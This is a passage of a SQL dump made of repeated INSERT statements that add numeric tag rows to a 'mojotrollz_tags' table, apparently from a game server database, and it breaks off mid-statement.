INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22508, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22508, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22509, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22509, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22509, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22509, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22509, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22510, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22510, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22510, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22510, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22510, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22511, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22511, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22511, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22511, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22511, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22512, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22512, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22512, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22512, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22512, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22513, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22513, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22513, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22513, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22513, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22514, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22514, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22514, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22514, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22514, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22515, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22515, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22515, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22515, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22515, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22516, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22516, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22516, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22516, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22516, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22517, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22517, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22517, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22517, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22517, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22518, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22518, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22518, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22518, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22518, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22519, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22519, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22519, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22519, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22519, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23059, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23059, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23059, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23059, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23059, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23060, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23060, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23060, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23060, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23060, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23061, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23061, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23061, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23061, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23061, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23062, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23062, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23062, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23062, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23062, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23063, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23063, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23063, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23063, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23063, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23064, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23064, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23064, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23064, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23064, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23065, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23065, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23065, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23065, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23065, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23066, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23066, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23066, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23066, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23066, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23067, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23067, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23067, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23067, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (23067, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (19, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (20, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (21, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (25, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (26, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (27, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (28, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (29, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (30, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (31, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (33, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (34, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (35, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (38, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (39, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (40, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (46, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (47, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (49, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (51, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (52, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (53, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (54, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (55, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (56, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (57, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (60, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (62, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (63, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (64, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (65, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (66, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (67, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (70, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (72, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (75, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (76, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (77, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (78, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (79, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (80, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (81, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (82, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (83, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (84, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (85, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (86, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (87, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (88, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (89, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (90, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (91, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (93, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (94, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (95, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (97, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (98, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (99, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (102, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (104, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (105, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (106, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (107, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (109, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (110, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (114, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (115, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (116, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (117, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (118, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (119, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (120, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (121, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (122, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (124, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (125, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (126, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (127, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (128, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (129, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (130, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (131, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (132, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (133, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (134, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (135, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (145, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (146, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (150, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (154, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (155, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (156, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (157, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (159, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (160, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (161, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (162, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (163, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (164, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (165, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, 